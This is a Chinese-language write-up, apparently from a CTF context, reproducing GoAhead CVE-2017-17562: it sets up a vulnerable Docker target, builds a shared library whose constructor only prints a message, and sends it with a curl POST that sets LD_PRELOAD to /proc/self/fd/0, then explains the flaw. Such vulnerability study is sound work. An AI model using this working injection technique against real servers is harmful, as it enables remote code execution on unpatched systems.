GoAhead CVE-2017-17562 研究报告

CVE-2017-17562是一个关于GoAhead Web Server远程命令执行的一个漏洞，该漏洞于2017年12月被爆出，影响GoAhead 2.5.0-3.6.4版本。目前已经过了快一年时间，但是一个CTF考到了这个CVE，正好记录一下。

复现

靶机环境

首先得做一个靶机，这里就用docker开个ubuntu作靶机吧：

docker run --name=goaheadv364 -it -p 0.0.0.0:80:80 ubuntu bash
# 安装git和gcc
apt update && apt install -y git gcc make
# 安装goaheadv3.6.4
git clone https://github.com/embedthis/goahead.git
cd goahead
git checkout tags/v3.6.4 -q
make

接着跑一个GoAhead服务，这里用自带的测试服务好了:

cd test
gcc ./cgitest.c -o cgi-bin/cgitest
../build/linux-x64-default/bin/goahead

payload

准备payload.c文件：

#include 
#include 
#include 

static void before_main(void) __attribute__((constructor));
static void before_main(void) {
    printf("hello, payload executed.\n");
}

编译payload：

gcc -shared -fPIC ./payload.c -o payload.so

发送payload到靶机：

curl -X POST --data-binary @payload.so http://192.168.99.100/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i

可以看到payload被执行：

1538570084411.png

原理解释

实际上腾讯的“开源Web服务器GoAhead漏洞CVE-2017-17562分析“ 一文已经对此漏洞进行了详细解释，这里只概括的说一下。

首先，GoAhead代码存在以下两点问题：

1. 因为cgiHandler的过滤不当，导致LD_PRELOAD变量可控，而程序会读取LD_PRELOAD变量记录的文件路径并且执行代码；

2. launchCgi函数调用系统函数dup2()将stdin文件描述符指向了POST请求数据对应的临时文件。

从发送payload的命令可以看到，我们的POST中控制了两个输入，一个是LOAD_PRELOAD参数（将它设置为了/proc/self/fd/0），一个是POST的data（将它设置为了我们编译生成的动态链接库）。/proc/self/fd/0 是Linux的伪文件系统文件，实际上指的是stdin，以下命令的执行结果可以说明这一点：

1538571783966.png

这样结合第一条，即程序会从我们标准输入中取代码执行，又因为第二条，我们的标准输入被定向到了POST的临时文件中，具体来说，即定向到了我们的payload.so文件上，这样整个原理就走通了。